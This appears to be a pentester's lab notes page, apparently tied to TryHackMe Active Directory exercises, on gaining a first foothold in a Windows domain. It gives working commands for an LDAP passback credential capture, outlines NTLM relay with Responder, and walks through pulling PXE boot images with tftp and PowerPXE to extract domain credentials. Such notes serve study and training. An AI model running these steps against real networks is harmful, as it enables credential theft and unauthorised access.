1. Getting Foothold

Brute Forcing NetNTLM

Internet facing applications may have their authentication tied back to an AD. If we manage to brute force these credentials, we may have access to the server

LDAP Passback attack

If we have access to a page with LDAP configurations and password censored out, we can setup our own LDAP server to intercept the traffic and obtain the password

$ sudo apt-get update && sudo apt-get -y install slapd ldap-utils && sudo systemctl enable slapd

$ sudo dpkg-reconfigure -p low slapd

Create a olcSaslSecProps.ldif file

#olcSaslSecProps.ldif
dn: cn=config
replace: olcSaslSecProps
olcSaslSecProps: noanonymous,minssf=0,passcred

Patch the existing LDAP file with the created file

$ sudo ldapmodify -Y EXTERNAL -H ldapi:// -f ./olcSaslSecProps.ldif && sudo service slapd restart

Run TCPdump and click Test Settings to send the request

$ sudo tcpdump -SX -i <interface> tcp port 389

SMB Auth Relay

Use Responderto intercept NTLM authentication traffic.

LogoGitHub - lgandx/Responder: Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.GitHub

After we get the NTLM hash, we can either

  1. Crack the hash

  2. Relay the hash and MITM the process of getting a TGS. For this to happen, SMB signing needs be disabled, or enabled but not enforced.

Microsoft Development Toolkit

Extracting credentials preloaded in the PXE boot image

Downloading the BCD file from the MDT site

C:\Users\THM\Documents\Am0> tftp -i <THMMDT IP> GET "\Tmp\x64{39...28}.bcd" conf.bcd

Getting the location of the wim file

C:\Users\THM\Documents\Am0> powershell -executionpolicy bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.   

PS C:\Users\THM\Documents\am0> Import-Module .\PowerPXE.ps1
PS C:\Users\THM\Documents\am0> $BCDFile = "conf.bcd"
PS C:\Users\THM\Documents\am0> Get-WimFile -bcdFile $BCDFile
>> Parse the BCD file: conf.bcd
>>>> Identify wim file : \Boot\x64\Images\LiteTouchPE_x64.wim
\Boot\x64\Images\LiteTouchPE_x64.wim

Download the WIM file and extract credentials

PS C:\Users\THM\Documents\am0> tftp -i <THMMDT IP> GET "\Boot\x64\Images\LiteTouchPE_x64.wim" pxeboot.wim
Transfer successful: 341899611 bytes in 218 second(s), 1568346 bytes/s
PS C:\Users\THM\Documents\am0> Get-FindCredentials -WimFile pxeboot.wim
>> Open pxeboot.wim
>>>> Finding Bootstrap.ini
>>>> >>>> DeployRoot = \\THMMDT\MTDBuildLab$
>>>> >>>> UserID = <account>
>>>> >>>> UserDomain = ZA
>>>> >>>> UserPassword = <password>

Configuration files

If we already have access to the host machine, search for artifacts that may contain credentials

  • Configuration files

  • Data stores

  • Password stores

PreviousWindowsNext2. Windows Exploitation

Last updated